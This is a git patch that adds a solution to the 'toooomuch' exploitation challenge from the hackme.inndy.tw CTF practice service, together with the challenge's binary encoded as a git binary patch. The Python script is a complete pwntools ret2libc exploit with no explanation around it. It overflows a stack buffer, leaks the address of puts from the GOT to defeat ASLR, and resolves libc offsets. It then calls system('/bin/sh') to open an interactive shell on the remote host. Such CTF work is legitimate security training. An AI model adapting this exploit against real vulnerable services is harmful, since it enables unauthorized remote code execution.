From f41c482911d46d2f202823d430ef9558fee20695 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Sat, 4 Sep 2021 00:05:53 +0800
Subject: [PATCH] Finished stackoverflow/ASLR

---
 stackoverflow/ASLR/answer.py |  30 ++++++++++++++++++++++++++++++
 stackoverflow/ASLR/toooomuch | Bin 0 -> 6844 bytes
 2 files changed, 30 insertions(+)
 create mode 100644 stackoverflow/ASLR/answer.py
 create mode 100755 stackoverflow/ASLR/toooomuch

diff --git a/stackoverflow/ASLR/answer.py b/stackoverflow/ASLR/answer.py
new file mode 100644
index 0000000..599363b
--- /dev/null
+++ b/stackoverflow/ASLR/answer.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level = "debug"
+context(arch = "i386",os = "linux")
+
+p = remote("hackme.inndy.tw", 7702)
+#p = process('./toooomuch')
+elf = ELF('./toooomuch')
+p.recvuntil("Give me your passcode: ")
+
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+toooomuch_func = elf.sym['toooomuch']
+payload = 0x18*'z'+p32(0)+p32(puts_plt)+p32(toooomuch_func)+p32(puts_got)
+p.sendline(payload)
+p.recvuntil("You are not allowed here!\n")
+puts_libc = u32(p.recv(4))
+
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+system_libc = libc_base + libc.dump('system')
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+p.recvuntil("Give me your passcode: ")
+
+payload = 0x18*'z'+p32(0)+p32(system_libc)+p32(toooomuch_func)+p32(binsh_libc)
+p.sendline(payload)
+
+p.interactive()
diff --git a/stackoverflow/ASLR/toooomuch b/stackoverflow/ASLR/toooomuch
new file mode 100755
index 0000000000000000000000000000000000000000..7117e6dd0f182211fc7942cf19726284b422939a
GIT binary patch
literal 6844
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
N^&Lb9RjvxH@83mF$rJzp

literal 0
HcmV?d00001